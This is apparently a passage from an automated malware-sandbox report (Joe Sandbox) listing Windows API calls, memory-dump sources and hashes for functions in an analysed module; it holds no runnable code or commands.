                                        • FindFirstFileW.KERNEL32(?,?), ref: 6C9175BC
                                        • FindClose.KERNEL32(00000000), ref: 6C9175C8
                                        • lstrlenW.KERNEL32(?), ref: 6C9175E6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                        • String ID:
                                        • API String ID: 624941980-0
                                        • Opcode ID: 708044b7188cd0276dfec8e0330bbdd239b37ee7fa9c92f150b7767edc43bd3a
                                        • Instruction ID: c53d36f0d339bba54ab4f77ca2674a39815092a41e12e0e1e5454237a83ce710
                                        • Opcode Fuzzy Hash: 708044b7188cd0276dfec8e0330bbdd239b37ee7fa9c92f150b7767edc43bd3a
                                        • Instruction Fuzzy Hash: 3041A47090D21EABDF249F65CC4EBAE7A7DAF21358F100699E819D1D91DB35CA84CF10
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6C927C6C
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C927C81
                                        • UnhandledExceptionFilter.KERNEL32(6C93A4B8), ref: 6C927C8C
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6C927CA8
                                        • TerminateProcess.KERNEL32(00000000), ref: 6C927CAF
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: 5660b1a329e0c98a21de5daee40f1b4326207978a3a699744cfe3648618e05a8
                                        • Instruction ID: 8d0747f88b5f67c12154be27b5538289adaa1377cf0f6869b37746e7b071f681
                                        • Opcode Fuzzy Hash: 5660b1a329e0c98a21de5daee40f1b4326207978a3a699744cfe3648618e05a8
                                        • Instruction Fuzzy Hash: F121FEB471A284DFDB41EFA5C4896883BB8BB0A309F70811BE5089B350E7749984CF45
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6C9189FC
                                        • __snwprintf_s.LIBCMT ref: 6C918A2E
                                        • LoadLibraryW.KERNEL32(?), ref: 6C918A69
                                          • Part of subcall function 6C925348: __getptd_noexit.LIBCMT ref: 6C925348
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                        • String ID: LOC
                                        • API String ID: 3175857669-519433814
                                        • Opcode ID: 6893485b9128813e3efa96b115b480adcda545be4971cde43ddc56eb14f7e2b7
                                        • Instruction ID: 9338c27f7f73f6fe92bb52f7f99a5969db8d8815b983e502ecbfabdffffeceee
                                        • Opcode Fuzzy Hash: 6893485b9128813e3efa96b115b480adcda545be4971cde43ddc56eb14f7e2b7
                                        • Instruction Fuzzy Hash: B6110A71A5830CABDB14AB74CC86BED77FCAB21368F110062A114A7D84DB74DE08D764
                                        APIs
                                        • GetKeyState.USER32(00000010), ref: 6C920514
                                        • GetKeyState.USER32(00000011), ref: 6C92051D
                                        • GetKeyState.USER32(00000012), ref: 6C920526
                                        • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6C92053C
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: State$MessageSend
                                        • String ID:
                                        • API String ID: 1440529007-0
                                        • Opcode ID: efb0529bf158321d02e74b0f1dad38a9be85d853676aea2a731a1b408a261589
                                        • Instruction ID: ebd89bc1abc5bc23133cbff1f2475e204ad92792038d87c124d06468efe2a3ff
                                        • Opcode Fuzzy Hash: efb0529bf158321d02e74b0f1dad38a9be85d853676aea2a731a1b408a261589
                                        • Instruction Fuzzy Hash: B6F0E9367B93CFA6EB1429764C51FF909388FB1BD4F10107266C9EA9C8CFA4C40A4670
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C918BE9
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C918EB7,?,?), ref: 6C918C19
                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C918C2D
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6C918C69
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6C918C77
                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C918C94
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6C918CBF
                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C918CC8
                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6C918CE1
                                        • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6C918CFE
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6C918D31
                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 6C918D3A
                                        • GetModuleFileNameW.KERNEL32(6C910000,?,00000105), ref: 6C918D7F
                                        • _memset.LIBCMT ref: 6C918D9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                        • API String ID: 3537336938-2299501126
                                        • Opcode ID: 790ec55e42e6ba09a2f8f9f2787d9345db8f7f4d9c9afe4e9d2e100328b6258b
                                        • Instruction ID: 04083849c69bd5a34a06dc71fa30b5b26ff747efcb26e893eca72a9a5c84d181
                                        • Opcode Fuzzy Hash: 790ec55e42e6ba09a2f8f9f2787d9345db8f7f4d9c9afe4e9d2e100328b6258b
                                        • Instruction Fuzzy Hash: 3F516C70D152389ACB64EFA59C897ADB6F8EF68304F1101DBA448E3680D778CE81DF58
                                        APIs
                                        • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75A44A40,6C91DE36,?,?,?,?,?,?,?,6C91FCC6,00000000,00000002,00000028), ref: 6C91DCF9
                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6C91DD15
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C91DD2A
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6C91DD3B
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6C91DD4C
                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6C91DD5D
                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6C91DD6E
                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6C91DD8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                        • API String ID: 667068680-2451437823
                                        • Opcode ID: a573d466044bbedce04d2fcaf2187e306f62e02b4d98f61b436ea41dab1dd951
                                        • Instruction ID: 124e91747d30c9ae9da48860d8b021a25836ab21b0376b6540e3d6ab1604c1fa
                                        • Opcode Fuzzy Hash: a573d466044bbedce04d2fcaf2187e306f62e02b4d98f61b436ea41dab1dd951
                                        • Instruction Fuzzy Hash: 9A216D72A2D1B59F9F03BF6488C952A7AF8B78B20D371DA7FD109E2E04D77080508E11
                                        APIs
                                        • GetParent.USER32(?), ref: 6C91FC05
                                        • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C91FC28
                                        • GetWindowRect.USER32(?,?), ref: 6C91FC42
                                        • CopyRect.USER32(?,?), ref: 6C91FCA5
                                        • CopyRect.USER32(?,?), ref: 6C91FCAF
                                        • GetWindowRect.USER32(00000000,?), ref: 6C91FCB8
                                          • Part of subcall function 6C91DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C91DED6
                                        • CopyRect.USER32(?,?), ref: 6C91FCD4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Rect$Copy$Window$ByteCharMessageMultiParentSendWide
                                        • String ID: (
                                        • API String ID: 2332539329-3887548279
                                        • Opcode ID: cdddf5b949ce22746539d7f4894fe18d8be65235405324b6356fcae9f7d9cc05
                                        • Instruction ID: 805b1bc5ba340a7feb235fbbfa4e2f923b4c3bdc8ace38d1738652e27aab784f
                                        • Opcode Fuzzy Hash: cdddf5b949ce22746539d7f4894fe18d8be65235405324b6356fcae9f7d9cc05
                                        • Instruction Fuzzy Hash: C4519072A0861DABDB01CBA8CD85AEEBBBDAF48358F150116F905F7A40DB30E905CB54
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C9219B8
                                          • Part of subcall function 6C91C050: __EH_prolog3.LIBCMT ref: 6C91C057
                                        • CallNextHookEx.USER32(?,?,?,?), ref: 6C9219F8
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        • _memset.LIBCMT ref: 6C921A51
                                        • GetClassLongW.USER32(?,000000E0), ref: 6C921A85
                                        • GetClassNameW.USER32(?,?,00000100), ref: 6C921B20
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C921B5D
                                        • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6C921B6F
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C921B77
                                        • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6C921B86
                                        • CallNextHookEx.USER32(?,00000003,?,?), ref: 6C921BA6
                                        • UnhookWindowsHookEx.USER32(?), ref: 6C921BBA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: HookProp$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_LongNameThrowUnhookWindows_memset
                                        • String ID: #32768$AfxOldWndProc423
                                        • API String ID: 3902210324-2141921550
                                        • Opcode ID: c57b9782da692f81ddac9a12d1f7e4a686824b3c7ff4239fb3ffa1ce536195ee
                                        • Instruction ID: 6cbaeb622983bb575eee20eb9218c8dbd3168d80c6a7230ef6a2af5548cc670c
                                        • Opcode Fuzzy Hash: c57b9782da692f81ddac9a12d1f7e4a686824b3c7ff4239fb3ffa1ce536195ee
                                        • Instruction Fuzzy Hash: 72510831514229ABCF219F60CC48BEA7BB8BF16355F100185F44DE6A94DB39CE94CFA4
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C93E928,0000000C,6C92A25A,00000000,00000000,?,6C92A5D4,00000000,00000001,00000000,?,6C92A89E,00000018,6C93E978,0000000C), ref: 6C92A131
                                        • __crt_waiting_on_module_handle.LIBCMT ref: 6C92A13C
                                          • Part of subcall function 6C925BCF: Sleep.KERNEL32(000003E8,00000000,?,6C92A082,KERNEL32.DLL,?,?,6C92A416,00000000,?,6C92488C,00000000,?,?,?,6C9248EF), ref: 6C925BDB
                                          • Part of subcall function 6C925BCF: GetModuleHandleW.KERNEL32(00000000,?,6C92A082,KERNEL32.DLL,?,?,6C92A416,00000000,?,6C92488C,00000000,?,?,?,6C9248EF,?), ref: 6C925BE4
                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C92A165
                                        • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6C92A175
                                        • __lock.LIBCMT ref: 6C92A197
                                        • InterlockedIncrement.KERNEL32(?), ref: 6C92A1A4
                                        • __lock.LIBCMT ref: 6C92A1B8
                                        • ___addlocaleref.LIBCMT ref: 6C92A1D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                        • API String ID: 1028249917-2843748187
                                        • Opcode ID: 290fe6c3fa95b4611c9613622d422096788ce400adce5abb5836bf1c0bd57b97
                                        • Instruction ID: b59040ac651f5111cb1356b1c2f4722acf7c89ce08e0a556210c1397d2ba4f54
                                        • Opcode Fuzzy Hash: 290fe6c3fa95b4611c9613622d422096788ce400adce5abb5836bf1c0bd57b97
                                        • Instruction Fuzzy Hash: A711D5714047019FDB209F758804B9ABBF0AF65328F10950AD4D9D3B90CF78EA44DF64
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6C918503
                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C918520
                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6C91852D
                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6C91853A
                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6C918547
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                        • API String ID: 667068680-2424895508
                                        • Opcode ID: ff6b6614069009198cfe098f9e0b9a96d7d26a2beb5ffae84dc7fb8fccfed8ca
                                        • Instruction ID: 7c31658846cd99d8d14d59245ec71da8af514c875bec3208d7eb35f6e8254c41
                                        • Opcode Fuzzy Hash: ff6b6614069009198cfe098f9e0b9a96d7d26a2beb5ffae84dc7fb8fccfed8ca
                                        • Instruction Fuzzy Hash: 7D1121B1A1D295AF8B18BFB6888A416BFB8EB4735CB25857FE109C3900E730C540DA19
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32,6C91A6B6), ref: 6C91A5AA
                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C91A5CB
                                        • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C91A5DD
                                        • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C91A5EF
                                        • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C91A601
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                        • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                        • API String ID: 417325364-2424895508
                                        • Opcode ID: 443ae36f18e3cf1335a236a3540198048e9fbad8884d0a6075a54815f3f970d8
                                        • Instruction ID: ff02b53af6e1599733f4e6d13d528281a7a1ce1bb647a5f8bfbae46fe161df51
                                        • Opcode Fuzzy Hash: 443ae36f18e3cf1335a236a3540198048e9fbad8884d0a6075a54815f3f970d8
                                        • Instruction Fuzzy Hash: 96F0D4B4A1D2B5ABCF44BFB288089167EB8B74625CF20991BA818D3A00DB70C108CF49
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                                        • String ID: .CHM$.HLP$.INI
                                        • API String ID: 2477486372-4017452060
                                        • Opcode ID: cccc0fa5d3bad4e19ab7a83f23dbfcbc2eba645aeb77bb898c9af6ebb2b279e0
                                        • Instruction ID: 8793ccd7e64e19cecb13fe6f3db50989df84ad1f3ea40e117a1edc7c134afb89
                                        • Opcode Fuzzy Hash: cccc0fa5d3bad4e19ab7a83f23dbfcbc2eba645aeb77bb898c9af6ebb2b279e0
                                        • Instruction Fuzzy Hash: DC419EB1A0861D9BDB20EB75CC45BCAB3FCAF54308F1009BA954AD7E40EB30D948CB64
                                        APIs
                                        • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6C911BE9,?,?,?,?), ref: 6C911C39
                                        • GetLastError.KERNEL32(?,?,?,?,?,6C911BE9,?,?,?,?), ref: 6C911C48
                                        • __aullrem.LIBCMT ref: 6C911C60
                                        • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6C911CE8
                                        • _memset.LIBCMT ref: 6C911CF5
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6C911BE9,?,?,?,?), ref: 6C911D07
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                        • String ID:
                                        • API String ID: 123228641-0
                                        • Opcode ID: 6c2c065ef67e3e94a3454471708de12189d265c7ae1442853c9ed18230224882
                                        • Instruction ID: a5afaed27bd3d0b7053c4769457f87d698a4e0facaad58aaff688c79e6e85134
                                        • Opcode Fuzzy Hash: 6c2c065ef67e3e94a3454471708de12189d265c7ae1442853c9ed18230224882
                                        • Instruction Fuzzy Hash: 3E519E71608305AFD750CF29C841BABB7ECFF99758F004A2AF958E3641E770D9048BA2
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C91BE14
                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 6C91BE25
                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?,?,?,?), ref: 6C91BE43
                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BE77
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BEE3
                                        • _memset.LIBCMT ref: 6C91BF02
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6C91BF13
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BF34
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                        • String ID:
                                        • API String ID: 1891723912-0
                                        • Opcode ID: a3fc592bc6df263a85db40aade37ee72767ae261dc2759ec46b478a5d8488f4a
                                        • Instruction ID: ed75140287cb4d8e501039ad69cbc8b5cd341146036969b06408ce50c40d6f6e
                                        • Opcode Fuzzy Hash: a3fc592bc6df263a85db40aade37ee72767ae261dc2759ec46b478a5d8488f4a
                                        • Instruction Fuzzy Hash: C231B2B0508609EFDB24EF50C886C5AB7B6FF11314B20C52AE65A97F50CB30E954CF80
                                        APIs
                                          • Part of subcall function 6C91815A: GetParent.USER32(?), ref: 6C9181AE
                                          • Part of subcall function 6C91815A: GetLastActivePopup.USER32(?), ref: 6C9181BF
                                          • Part of subcall function 6C91815A: IsWindowEnabled.USER32(?), ref: 6C9181D3
                                          • Part of subcall function 6C91815A: EnableWindow.USER32(?,00000000), ref: 6C9181E6
                                        • EnableWindow.USER32(?,00000001), ref: 6C918247
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 6C91825B
                                        • GetCurrentProcessId.KERNEL32(?,?), ref: 6C918265
                                        • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C91827D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6C9182F9
                                        • EnableWindow.USER32(00000000,00000001), ref: 6C918340
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                        • String ID: 0
                                        • API String ID: 1877664794-4108050209
                                        • Opcode ID: 1fd3c558419dd5113a8a9d45c742ecc8f71023fd5eede85e86214881d679c883
                                        • Instruction ID: e511abc120d485181ab5814116dfe4fc496417fc1b26c419951f1529a18ff86f
                                        • Opcode Fuzzy Hash: 1fd3c558419dd5113a8a9d45c742ecc8f71023fd5eede85e86214881d679c883
                                        • Instruction Fuzzy Hash: 56412731A0465C9FDB25CF64CC8ABDA77B8FF11354F21095BE418E6A41D770DE809B98
                                        APIs
